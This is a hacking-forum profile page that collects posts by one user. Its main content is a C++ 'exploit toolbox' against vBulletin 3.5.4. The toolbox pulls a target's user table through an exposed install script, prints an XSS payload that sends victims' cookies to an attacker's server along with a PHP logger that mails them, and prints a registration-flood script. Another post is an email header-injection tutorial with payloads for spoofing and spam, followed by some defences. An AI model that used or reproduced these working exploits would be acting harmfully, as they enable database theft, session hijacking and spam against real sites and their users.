M4k3

Members
  • Content count

    32
  • Joined

  • Last visited

Community Reputation

-1 Noobie

About M4k3

  • Rank
    H4x0r

Contact Methods

  • AIM
    mika2pl
  • Website URL
    http://www.pldsoft.com

Profile Information

  • Interests
    PHP, MySQL, C, C++, Perl and Python
  1. Well, the new Version released: 69...challenges in the following topics.. -Javascript -Programming -Cryptology -Steganography -PHP -Realistic -Visual Basic -Cracking just check it out... Hackit and Challenge System
  2. Hello mates, Today PLDsecurity opened the Web Security Challenge System, with currently 36 challenges in Js, VB, Crypto and Realistic, check it out and have fun. More Challenges will be added soon. www.pldsecurity.de/forum/challenges.php Regards, Michael
  3. #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #include <string.h> #include <iostream> using namespace std; string exploit; string answer; string answer2; long s; sockaddr_in addr; char IPaddr[1024]; /*You have to change to the right path*/ char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n"; char stry[41943040]; long I; long M, J, K, L; int i; int main() { cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl; cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl; cout << "> Press 1 for Install_path exploit" << endl; cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl; cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl; cout << "> Programm Author M4k3, www.pldsoft.com" << endl; cout << "> Copyright by PLDsoft.com" << endl; cout << "> Number? "; cin >> exploit; cout << endl; if (exploit == "1") { cout << " ____________________ " << endl; cout << " |---PLDsoft.com------|" << endl; cout << " |--------------------|" << endl; cout << " |-vbulletin 3.5.4---|" << endl; cout << " |install_path exploit|" << endl; cout << " |____________________|" << endl; cout << "##############################################" << endl; cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl; cout << "###############################################" << endl; cout << endl; cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl; cout << "Remote : Yes" << endl; cout << "Critical Level : Dangerous"<< endl; cout << "############################################" << endl; cout << "Affected software description :" << endl; cout << endl; cout << "Application : vbulletin" << endl; cout << "version : latest version [ 3.60 Release 4 ]" << endl; cout << "URL : http://www.vbulletin.com" << endl; cout << endl; cout << "########################################" << endl; cout << "Exploit:" << endl; cout << endl; cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl; cout << endl; cout << "when it works, you can download the database..." << endl; cout << endl; cout << "########################################" << endl; cout << "Contact:" << endl; cout << "Nick: M4k3" << endl; cout << "E-mail: m4k3@pldsoft.com" << endl; cout << "Website: http://www.pldsoft.com" << endl; cout << "_______End of Exploit______" << endl; cout << endl; sleep(1); cout << "Use the exploit now?" << endl; cout << "yes/no: "; cin >> answer; } if (answer == "yes") { cout << "Starting vbulletin 3.5.4 install_path exploit" << endl; { cout << "Insert IP: "; cin >> IPaddr; M = 0; J = 0; K = 0; L = 0; while(IPaddr[i] != 0) { if(IPaddr[i] >= '0' && IPaddr[i] <= '9') { L *= 10; L += IPaddr[i] - '0'; K++; if(K > 3) { M = -1; break; } } else if(IPaddr[i] == '.') { if(K == 0) { M = -1; break; } if(L >= 255) { M = -1; break; } J++; K = 0; L = 0; } else { M = -1; break; } M++; } if(M == -1 || J != 3) { cout << "> Invalid IP-Address!" << endl; return 0; } s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); addr.sin_family = AF_INET; inet_aton(IPaddr, &addr.sin_addr); addr.sin_port = htons(80); if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in))) { printf("Failure: Connection Rested!\r\n"); close(s); return 1; } if(send(s, sget, strlen(sget), 0) == 0) { printf("Failure: Not able to send packets!\r\n"); close(s); return 2; } if((I = recv(s, stry, 41943040, 0)) == 0) { printf("Failure: Not able to receive packets!\r\n"); close(s); return 3; return 0; } close(s); printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I); printf("%s", stry); return 0; } } else if (exploit == "2") { cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl; cout << "=> Author: SpiderZ"<< endl; cout << "=> Sito: www.spiderz.tk"<< endl; cout << endl; cout << "_____________________________________________________________"<< endl; cout << endl; cout << "( 1 )"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl; cout << "if(!empty($ip_adresse)) "<< endl; cout << "{ "<< endl; cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl; cout << "} "<< endl; cout << "else "<< endl; cout << "{ "<< endl; cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl; cout << "} "<< endl; cout << "?> "<< endl; cout << endl; cout << "<a href=""log.php""></a><?"<< endl; cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl; cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl; cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl; cout << "else $visitor_info = $REMOTE_HOST;"<< endl; cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl; cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl; cout << "$x2=$REMOTE_PORT;"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$cookie = $_GET['c'];"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl; cout << "$today = date(""l, F j, Y, g:i a"");"<< endl; cout << "$subject = ""Xss Vbulletin"";"<< endl; cout << "$message = ""Xss: Hacking"""<< endl; cout << "Ip: $ip_adresse "<< endl; cout << "Cookie: $cookie"<< endl; cout << "Url: $base"<< endl; cout << "porta usata: $xx1"<< endl; cout << "remote port: $x2"<< endl; cout << "Giorno & Ora : $today \n"<< endl; cout << endl; cout << "$from = ""From: $myemail\r\n"";"<< endl; cout << "mail($myemail, $subject, $message, $from);"<< endl; cout << "?>"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "( 2 )"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "Name file: image.gif"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl; cout << "c=""+document.cookie' b='</pre' >"""<< endl; cout << endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "( 3 )"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "Like Using"<< endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "1 new thread"<< endl; cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl; cout << "3 Submit"<< endl; cout << "4 It waits for"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "# www.spiderz.tk " << endl; cout << endl; cout << "_______End of Exploit______" << endl; } else if (exploit == "3") { cout << "Script : vBulletin Version 3.5.4" << endl; cout << endl; cout << "site : www.vbulletin.com" << endl; cout << endl; cout << "Exploit by : x-boy" << endl; cout << endl; cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl; cout << endl; cout << "Type : Registration flood in register.php" << endl; cout << endl; cout << "Thanks to : Simo64" << endl; cout << endl; cout << endl; cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl; cout << endl; cout << "cURL Must be activated (http://curl.haxx.se)" << endl; cout << endl; cout << "Sorry for my bad English :-)" << endl; cout << endl; cout << endl; cout << "<?" << endl; cout << endl; cout << "set_time_limit(60);" << endl; cout << endl; cout << "//You can change 10 to other numbers" << endl; cout << endl; cout << "for($i = 1; $i <= 10; $i++)" << endl; cout << endl; cout << "{" << endl; cout << endl; cout << "//to put curl to send POST request" << endl; cout << endl; cout << "$ch = curl_init();" << endl; cout << endl; cout << "//change http://localhost/vb3 to the url of the script" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_POST , 1);" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl; cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl; cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl; cout << "con" << endl; cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm" << endl; cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl; cout << "corrections always on&options[showemail]=1');" << endl; cout << endl; cout << "curl_exec($ch);" << endl; cout << endl; cout << "curl_close($ch);" << endl; cout << endl; cout << "}" << endl; cout << endl; cout << "//Flood finished good luck" << endl; cout << endl; cout << "?>" << endl; cout << endl; cout << "____End of Exploit___" << endl; } else { cout << "File not found / Failed to open file" << endl; } cout << endl; cout << endl; cout << endl; cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl; cout << "Contact m4k3@pldsecurity[dot]de" << endl; return 0; } This ExploitBox Insert the 3 relesed vbulletin exploits. 1.) Install_path exploit 2.) Xss vbulletin 3.5.x (test: 3.5.4) 3.) vBulletin 3.5.4 Flood Exploit The vbulletin Install_path exploit, is useable in this code the other two exploits can only be watched.
  4. New Links released: http://www.pldsecurity.de/index.php?option...1&Itemid=70
  5. Video get reuploaded.....on pldsoft.com.
  6. Hello mates, Find SQL Passwords, Mails and other private things....take a look on this video..... http://www.pldsecurity.de/index.php?option...1&Itemid=70 you find the video on the footer of the page.... enjoy it....
  7. Im still searching, where i have upload the video...sry guys....when i dont find it i will make a new one.
  8. So tell me Sean....you will host now videos or not? Regards, Michael
  9. When you interested in anonymous email accounts you maybe interesting in something like that: Related Topics Category:Injection_Attacks There are a lot of ways to send anonymous emails, some use it to mass mail, some use it to spoof identity, and some (a few) use it to send email anonymously. Usually a web mailform using the mail() function generates emails containing headers with the originating IP of the server it's running on. Therefore the mailform acts as a SMTP proxy. The input fields of the form may vary, but it is common to specify a mailform that gives you control over the subject, the message, and the sender's email address. Function usage : mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]); (mail() (http://www.php.net/function.mail)) Extra params are not commonly fed from user input, so we'll skip this part. Since most webmasters carefully hardcode the recipient's email address into the contact form of their web application, one might think this sets a limit to the way this kind of script can be exploited (but one is wrong!).. Here's an example of code we'll base our analysis on : <?php $to="webmaster@website.com"; if (!isset($_POST["send"])){ // no post data -> display form ? > <form method="POST" action="<?=$_SERVER['PHP_SELF'];?>"> To: webmaster@website.com From: <input type="text" name="sender"> Subject : <input type="text" name="subject"> Message : <textarea name="message" rows="10" cols="60" lines="20"></textarea> <input type="submit" name="send" value="Send"> </form> <? }else{ // found post data .. deal with it $from=$_POST['sender']; // send mail : if (mail($to,$_POST['subject'],$_POST['message'],"From: $from\n")){ // display confirmation message if mail sent successfully echo "Your mail was indeed sent to $to."; }else{ // sending failed, display error message echo "Doh! Your mail could not be sent."; } } ?> When looking at the html form or at the code it seems obvious one cannot choose the recipient email address as it is hardcoded in the script. However it is possible to choose the subject, the message, and the sender email address (From: header). Using php mail() function roughly works as follows: <?php mail($recipient,$subject,$message,$headers); ?> .. and will produce a raw output : To: $recipient Subject: $subject $headers $message Thus when calling the function as follows : <?php mail("recipient@victim.xxx","Hello","Hi,\nYour site is great.\nBye","From: sender@anonymous.xxx\n"); ?> .. the raw output data looks like this : To: recipient@victim.xxx Subject: Hello From: sender@anonymous.xxx Hi, Your site is great. Bye The php code for the mailform provided earlier shows that the most interesting part the user can choose to feed in the form is the sender email address, because it is directly displayed inside the headers. In this example it is possible to modify or add other headers then the 'From:' using this form. Of course the 'message', 'To' and 'Subject' fields could also be used to inject some data but the mail() function and the RFC specifications would filter any content given to those fields to prevent it from being abused. What's the point of injecting email headers ? In this context, the target it to be able to send anonymous emails to other recipients. There are numerous additional fields that can be specified in the mail headers (see [RFC 822]). For example le 'Cc' (Carbon Copy), which sends a copy of the message to the email addresses given as arguments. A better choice is to use the 'Bcc' (Blind Carbon Copy) which sends a carbon copy ot the message just like with the 'Cc' header, except that the recipiends email addresses given as arguments are not shown to the multiple recipients' headers. As specified in the [RFC 822], one must add a line feed for every header. The <LF> (line feed) char has a hexadecimal value of 0x0A. Thus by providing the following values to the example script of this article : - Sender : "sender@anonymous.www%0ACc:recipient@someothersite .xxx%0ABcc:somebloke@grrrr.xxx,someotherbloke@oooo ps.xxx" - Subject : "ahem" - Message : "My Message..." The email's raw data will look like this : To: recipient@victim.xxx Subject: ahem From: sender@anonymous.xxx Cc:recipient@someothersite.xxx Bcc:somebloke@grrrr.xxx,someotherbloke@oooops.xxx My Message... ... mail headers injected successfully ! Despite the fact that the only header value the html form allows to specify if the 'From', the resulting email has been sent to three people of our choice : recipient@someothersite.xxx, somebloke@grrrr.xxx and someotherbloke@oooops.xxx In the last example, both 'Cc' and 'Bcc' headers have been used to perform the injection. It would also have been possible to use the 'To' header, the last value is added (just like in the "Cc" and "Bcc" fields) to the hardcoded email address of the webmaster. Let's keep the same value for subject and message, and give the following value to the sender : email@anonymous.xxx%0ATo:email1@who.xxx the mail output is : To: recipient@victim.xxx Subject: Hum From: email@anonymous.xxx To:email1@who.xxx My Message... Repeating the 'To' header won't be a problem, the mail will be sent to recipient@victim.xxx AND email1@who.xxx. Now let's consider a more restrictive purpose to send anonymous emails : spamming Many sites provide the possibility to "email this page to a friend" through a web form, the resulting email softly suggests to "visit our website" on behalf of the user that filled in the form with his personal email address, and the email address of the friend he wants the page to be emailed to : <?php $subject="Visit our site www.website.xxx !"; $message="Hello,\nA friend thought you might want to see this page : www.website.xxx.\nBye Bye."; if (!isset($_POST["send"])){ // no post data, display form ? > <form method="POST" action="<?=$_SERVER['PHP_SELF'];?>"> A : <input type="text" name="recipiend"> De: <input type="text" name="sender"> <input type="submit" name="send" value="Send"> </form> <? }else{ // found post data $from=$_POST['sender']; $to=$_POST['recipient']; // send mail : if (mail($to,$subject,$message,"From: $from\n")){ // success echo "Mail sent successfully to $to."; }else{ // failure echo "Doh ! Sending failed."; } } ?> Even though the subject and the message are hardcoded, there is still a way to inject headers (we already know how to add recipients). As covered earlier in this article, we saw that the 'To' header can be sent twice, the 'Subject' header is not an exception to this rule, and so it is for numerous other headers... By providing a recipient address buddy@pal.xxx and a sender address misterburns@springfield.xxx%0ASubject:My%20Anonymous%20Subject the email body will look like this : To: buddy@pal.xxx Subject: Visit our site www.website.xxx ! From: misterburns@springfield.xxx Subject: My Anonymous Subject Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye The subject "My Anonymous Subject" will be added to "Visit our site www.website.xxx !", and in some cases will replace it (depending on the mail services, smtp relays, mail client, etc). For example hotmail displays the added subject inside the message. Let's see now how to alter the message body. The difference between the body and the headers is that the body cannot be identified by its name (From, To, etc); there is no such 'Message' header existing in the [RFC 822]. And that's exactly how we will alter this part of the mail, a <LF> with no header name means that the message body started. So instead of specifying a <LF> and a header name, we will just add a <LF> and give our message. As both 'To' and 'Subject' headers are already defined, the resulting output will contain both the older message and the injected message, except that instead of being appended, it will be prepended. Say we provide this sender : badguy@badboys.com%0A%0AMy%20New%20%0AAnonymous%20Message. then the email will look like this : To: buddy@pal.xxx Subject: Visit our site www.website.xxx ! From: badguy@badboys.com My New Anonymous Message. Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye we can clearly see the that the new message : My New Anonymous Message is prepended to the old message : Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye to finally give this message My New Anonymous Message Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye There are more headers than "Cc", "Bcc","To","Subject" and "From" but this article will not cover all of them as they are not especially helpful for this article. However the "Content-Type" header can be very useful : this header has a default value set as "plain/text". It is possible to re-define this header as "text/html", and then provide some html content to the message by giving this value to the sender's email address : haxor@attack.com%0AContent-Type:text/html%0A%0AMy%20%New%0AHTML%20Anonymous%20Message.% 0A the email sent will look like : To: buddy@pal.xxx Subject: Visit our site www.website.xxx ! From: haxor@attack.com Content-Type:text/html My New HTML Anonymous Message. Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye when displayed, this email will have the text "HTML Anonymous Message." underlined. The mail() function respects the MIME (http://www.mhonarc.org/~ehood/MIME/) encoding. By knowing this, the header "Content-Type" can be used in different ways for injection purposes. The MIME (http://www.mhonarc.org/~ehood/MIME/) encoding (Multipurpose Internet Mail Extensions) can be used - in addition to send html mails - to attach files (sound, image, txt, etc). The fact is that the header "Content-Type" can be re-defined as "multipart/mixed" (or "multipart/alternative" or "multipart/related"), even though it was already defined previously. The injection possibility for this header is that the "multipart/mixed" can help us to separate the mail in several parts. Here's an example in MIME (http://www.mhonarc.org/~ehood/MIME/) format, with one recipient part : To: recip@ient.xxx Subject: Good Luck From: sender@spoofed.xxx Content-Type: multipart/mixed; boundary="MyBoundary"; Hidden Text1 --MyBoundary Content-Type: plain/text; Good Luck for you work, bye --MyBoundary-- Hidden Text2 First we see the header "To", "Subject" and "From" then the "Content-Type" defined as "multipart/mixed", then the "boundary" line which value is "MyBoundary". This boundary stuff is used as a separator (see [RFC 822] for detailed info) inside the message. It is also used to set the beginning/end of the first/last part ( "--[THE BOUNDARY]" ). Note : "[THE BOUNDARY]" can be replaced by any (US/ASCII [:alnum:]) value. Then we see a line "Hidden Text1". This text will not be visible to the recipient, because it is located before the first "boundary" declaration. Then we see the "--MyBoundary" line, announcing the beginning of the first message, and then, just after the "Content-Type" header (which will define the content type of this specific message part), some simple text. Then we see the message, and the line "--MyBoundary--", announcing the end of the email, and consequently having the last part "Hidden Text2" hidden to most web clients. Now the originating message and subject, both hardcoded in php, are ignored. So by providing the following value to the sender : haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog-- we get : To: recip@ient.xxx Subject: Visit www.website.xxx ! From: haxor@attack.xxx Content-Type:multipart/mixed; boundary=frog; --frog Content-Type:text/html My Message. --frog-- Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye and the message recieved by "recip@ient.xxx" is a HTML message containing "My Message." ("My Message." in Bold). The advertisement message (hardcoded) : Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye .... is NOT displayed. Note : boundary is sent with no quotes this time, just to show it applies event if magic_quotes_gpc=ON. This method is applicable in different context. Imagine a script where 'sender' can be specified and where some other field (like first name, last name, age, etc) is echoed in the message body once the form is submitted. In that case it is possible to get the same results (choose exactly what message the receipt will see) by providing the following value to the 'sender' header : haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A and to the optional field (e.g nickname) : %0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog-- the mail will look like : To: ami@friends.xxx Subject: Visit www.website.xxx ! From: haxor@attack.xxx Content-Type:multipart/mixed; boundary=frog; Hello, A friend called --frog Content-Type:text/html My Message. --frog-- thought you might want to see this page : www.website.xxx. Bye Bye As you can see, the hardcoded message has been split in two. The value of the optional field (nickname) has been replaced by the injected message, and whatever is after the inserted text will NOT be shown in the mail client. Now a last example, compiling all possibilities seen in this article, and more... juste give this value to the sender : haxor@attack.xxx%0ASubject:Ooops%0ABcc:target@nothappy.xxx%0AConte nt-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AHTML%20Message.%0A%0A--frog%0AContent-Type:text/html;name=Nastycode.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition:attachment%0A%0AHTML%20File%0A%0A--frog--%0A email is sent as follows : To: pal@friends.xxx Subject: Visit www.website.xxx ! From: haxor@attack.xxx Subject:Mwahahaha Bcc:target@nothappy.xxx Content-Type:multipart/mixed; boundary=frog; --frog Content-Type:text/html HTML Message. --frog-- Content-Type:text/html;name=Nastycode.html; Content-Transfer-Encoding:8bit Content-Disposition: attachment HTML File --frog-- Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye So the sender is : "haxor@attack.xxx", the subject is : "Visit www.website.xxx ! Oooops". This email will be received by "pal@friends.xxx", and a carbon copy will be sent to "target@nothappy.xxx". The email content will be HTML : HTML Message. a file named "Nastycode.html" with content type "text/html" will be attached to the email : HTML File [panic]Okay, the problem has been described, now is a good time to panic... [/panic] There are several ways to secure a script vulnerable to such injection attacks. First rule would be to filter user data, using regular expressions or string functions : <?php $from=$_POST["sender"]; if (eregi("\r",$from) || eregi("\n",$from)){ die("Why ?? "); } ?> more regexps here (http://www.regexlib.com/Search.aspx?k=email) We can see in the previous script that any occurence of "\r" or "\n" will make it die(). "\n" is equal to <LF> (Line Feed or 0x0A/%0A in hexadecimal), and "\r" is equal to <CR> (Carriage return or 0x0D/%0D in hexadecimal). Some chars like %0A%0D can be used as a substitute to %0A, but it is always the last char that is really dangerous. mod_security (http://www.modsecurity.org/) is also a good chunk of software (http://www.onlamp.com/pub/a/apache/2..._security.html) that can put a stop to Bcc injection on the server level. With modsecurity it is possible to scan the POST or GET body for bcc:, cc:, or to: and reject any request that contains those letters. To protect aginst main injection, add the bellow rule to your modsecurity setup. SecFilterSelective ARGS_VALUES ".*([Cc][Cc]|[Bb][Cc][Cc]|[Tt][Oo])[[:space:]]*\:.*\@" gotroot.com (http://gotroot.com/tiki-index.php?pa...f+mod_security) is a great source for modsecurity rules. It is a good idea to use their rules and configuration to protect users aginst other php exploits. Any virtual host having issues with modsecurity can have it disabled by adding the below setting to the VirtualHost container: <IfModule mod_security.c> SecFilterEngine Off </IfModule> Two points to remember when watching injections : Any existing data located *after* the injection point can be replaced. Any data to be added will always be located *after* the injection point (ex : "From"). There is another good point to this security measure despite the fact that subject and recipient values passed to the mail() function are cleaned : when using Emacs, the "Fcc" header is also protected from injections. This "Fcc" field contains the name of one file and directs Emacs (http://www.gnu.org/software/emacs/ma...l-Headers.html) to append a copy of the message to that file when you send the message. Although this works on Emacs (http://www.gnu.org/software/emacs/ma...-Headers.html), it is not possible with the PHP mail() function. Other exploit possibilities related to the MIME vulnerabilites (http://groups.google.com/groups?q=mime+vulnerabilities) are not developped in this article
  10. i have found it.....cause i was trying some code..... download link: http://www.zack6924-underground.net/forum/...pldsoft.com.rar
  11. The internet is full of idiot's site.
  12. Well, it is java. I will take a look and i will run it.
  13. Nice man. Good work.
  14. Then you have to create a forum....for people who have more knowlege then other.
  15. Well, you have try it on nulled version. I will make a new exploits who will break down the number code what you have enter. The Forums are now protected....because i have warn the admins...